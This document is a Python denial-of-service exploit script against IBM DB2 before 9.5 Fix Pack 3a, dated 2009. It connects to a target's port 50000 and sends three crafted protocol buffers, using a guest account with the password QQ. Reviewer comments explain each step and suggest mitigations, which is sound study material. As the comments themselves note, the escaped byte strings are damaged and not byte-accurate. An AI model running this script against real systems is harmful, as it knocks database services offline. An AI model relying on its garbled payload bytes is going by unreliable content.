# Title : IBM DB2 < 9.5 pack 3a Malicious Data Stream Denial of Service Exploit
# Published : 2009-04-03
# Author : Dennis Yurichev
# Discovered by Dennis Yurichev <dennis@conus.info>
# DB2TEST database should be present on target system
# GUEST account with QQ password should be present on target system
from sys import *
from socket import *
# Proof-of-concept for the denial-of-service condition named in the page title
# (IBM DB2 before 9.5 Fix Pack 3a). The script opens one TCP connection,
# writes three fixed request buffers to it, reads (and discards) a reply after
# the first two, and closes the socket. Nothing in the script checks whether
# the server is affected or how it reacted.
#
# NOTE(review): as printed on this page the string literals contain no
# backslash escapes, so they are ordinary ASCII text ("x00xBE...") rather than
# raw bytes. Treat the listing as a damaged transcription of the advisory, not
# as a byte-accurate capture; do not derive network signatures from it without
# checking against the original publication.
#
# NOTE(review): the header comments say an existing database (DB2TEST) and a
# valid GUEST account are prerequisites, which suggests the fault is reached
# only after a successful logon -- confirm against the vendor advisory. On
# that reading, removing default or trivially-passworded accounts and limiting
# which hosts can reach the database listener reduce exposure in addition to
# applying the fix pack named in the title.

# Plain blocking TCP socket; no timeout is configured, so each recv() below
# waits indefinitely if the peer never answers.
sockobj = socket(AF_INET, SOCK_STREAM)
# Target host comes from the first command-line argument (IndexError if it is
# missing); the port is hard-coded to 50000, presumably the DB2 instance
# listener -- verify for the deployment being assessed.
sockobj.connect ((argv[1], 50000))
# Request 1 of 3. The hex values include what looks like the database name in
# EBCDIC (C4 C2 F2 E3 C5 E2 E3 = "DB2TEST"); presumably the opening exchange
# of the DB2 wire protocol -- TODO confirm with a protocol decoder.
# send()'s return value is ignored, so a short write would go unnoticed.
sockobj.send(
"x00xBExD0x41x00x01x00xB8x10x41x00x7Fx11x5Ex97xA8"
"xA3x88x96x95x4Bx85xA7x85x40x40x40x40x40x40x40x40"
"x40x40xF0xF1xC2xF4xF0xF3xC2xF8xF0xF0xF0x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x60xF0xF0"
"xF0xF1xD5xC1xD4xC5x40x40x40x40x40x40x40x40x40x40"
"x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40"
"xC4xC2xF2xE3xC5xE2xE3x40xF0xC4xC2xF2x40x40x40x40"
"x40x40x40x40x40x40x40x40x40x00x18x14x04x14x03x00"
"x07x24x07x00x09x14x74x00x05x24x0Fx00x08x14x40x00"
"x08x00x0Bx11x47xD8xC4xC2xF2x61xD5xE3x00x06x11x6D"
"xE7xD7x00x0Cx11x5AxE2xD8xD3xF0xF9xF0xF5xF0x00x4A"
"xD0x01x00x02x00x44x10x6Dx00x06x11xA2x00x09x00x16"
"x21x10xC4xC2xF2xE3xC5xE2xE3x40x40x40x40x40x40x40"
"x40x40x40x40x00x24x11xDCx71x71x99xA7xDFxD5x8Fx18"
"x45x96xD6x07x08x8DxDCx60x4FxFAxE6x37x4Dx6Ax62xAB"
"x0CxE1x00xABxA3xD5x32x3E"
)
# Read up to 102400 bytes of reply; the value is stored in `data` but never
# examined, so a rejection by the server is not detected here.
data=sockobj.recv(102400)
# Request 2 of 3. Appears to carry the account named in the header comments in
# EBCDIC (87 A4 85 A2 A3 = "guest", 98 98 = "qq") together with the database
# name again -- presumably the logon step; TODO confirm with a decoder.
sockobj.send(
"x00x26xD0x41x00x01x00x20x10x6Dx00x06x11xA2x00x03"
"x00x16x21x10xC4xC2xF2xE3xC5xE2xE3x40x40x40x40x40"
"x40x40x40x40x40x40x00x35xD0x41x00x02x00x2Fx10x6E"
"x00x06x11xA2x00x03x00x16x21x10xC4xC2xF2xE3xC5xE2"
"xE3x40x40x40x40x40x40x40x40x40x40x40x00x06x11xA1"
"x98x98x00x09x11xA0x87xA4x85xA2xA3x00xBFxD0x01x00"
"x03x00xB9x20x01x00x06x21x0Fx24x07x00x23x21x35xF1"
"xF9xF2x4BxF1xF6xF8x4BxF0x4BxF1xF0xF8x4BxF3xF5xF3"
"xF3xF3x4BxF0xF8xF1xF0xF2xF3xF1xF6xF0xF8xF1x00x16"
"x21x10xC4xC2xF2xE3xC5xE2xE3x40x40x40x40x40x40x40"
"x40x40x40x40x00x0Cx11x2ExE2xD8xD3xF0xF9xF0xF5xF0"
"x00x0Dx00x2FxD8xE3xC4xE2xD8xD3xE7xF8xF6x00x1Cx00"
"x35x00x06x11x9Cx04xE4x00x06x11x9Dx04xB0x00x06x11"
"x9Ex04xE4x00x06x19x13x04xB8x00x3Cx21x04x37xE2xD8"
"xD3xF0xF9xF0xF5xF0xD5xE3x40x40x40x40x40x40x40x40"
"x40x40x40x40x40x40x40x40x97xA8xA3x88x96x95x4Bx85"
"xA7x85x40x40x40x40x40x40x40x40x40x40x87xA4x85xA2"
"xA3x40x40x40x00x00x05x21x3BxF1"
)
# Second reply is likewise read and ignored.
data=sockobj.recv(102400)
# Request 3 of 3, the last data written before the socket is closed. Its hex
# values read as ASCII in places: the database name (DB2TEST), a
# SET CURRENT LOCALE statement and a SELECT over SYSPROC.ENV_GET_INST_INFO().
# The page does not say which field of this stream the server mishandles, so
# this listing alone does not establish the root cause.
sockobj.send(
"x00x12xD0x41x00x01x00x0Cx10x41x00x08x14x04x14xCC"
"x04xE4x00x4ExD0x51x00x02x00x48x20x14x00x44x21x13"
"x44x42x32x54x45x53x54x20x20x20x20x20x20x20x20x20"
"x20x20x4Ex55x4Cx4Cx49x44x20x20x20x20x20x20x20x20"
"x20x20x20x20x53x59x53x53x48x32x30x30x20x20x20x20"
"x20x20x20x20x20x20x01x01x01x01x01x01x01x01x00x01"
"x00x35xD0x74x00x02x00x2Fx24x14x00x00x00x00x25x53"
"x45x54x20x43x55x52x52x45x4Ex54x20x4Cx4Fx43x41x4C"
"x45x20x4Cx43x5Fx43x54x59x50x45x20x3Dx20x27x65x6E"
"x5Fx55x53x27xFFx00x53xD0x51x00x03x00x4Dx20x0Dx00"
"x44x21x13x44x42x32x54x45x53x54x20x20x20x20x20x20"
"x20x20x20x20x20x4Ex55x4Cx4Cx49x44x20x20x20x20x20"
"x20x20x20x20x20x20x20x53x59x53x53x48x32x30x30x20"
"x20x20x20x20x20x20x20x20x20x53x59x53x4Cx56x4Cx30"
"x31x00x04x00x05x21x16xF1x00x1AxD0x53x00x03x00x14"
"x24x50x00x00x00x00x0Ax57x49x54x48x20x48x4Fx4Cx44"
"x20xFFx00x41xD0x43x00x03x00x3Bx24x14x00x00x00x00"
"x31x73x65x6Cx65x63x74x20x2Ax20x46x52x4Fx4Dx20x54"
"x41x42x4Cx45x20x28x73x79x73x70x72x6Fx63x2Ex65x6E"
"x76x5Fx67x65x74x5Fx69x6Ex73x74x5Fx69x6Ex66x6Fx28"
"x29x29xFFx00x66xD0x01x00x04x00x60x20x0Cx00x44x21"
"x13x44x42x32x54x45x53x54x20x20x20x20x20x20x20x20"
"x20x20x20x4Ex55x4Cx4Cx49x44x20x20x20x20x20x20x20"
"x20x20x20x20x20x53x59x53x53x48x32x30x30x20x20x20"
"x20x20x20x20x20x20x20x53x59x53x4Cx56x4Cx30x31x00"
"x04x00x08x21x14x00x00x7FxFFx00x06x21x41xFFxFFx00"
"x05x21x5Dx01x00x05x21x4BxF1"
)
# No reply is read after the third request; the connection is simply closed.
# The script has no try/finally, so an exception earlier leaves the socket to
# be reclaimed by interpreter exit.
sockobj.close()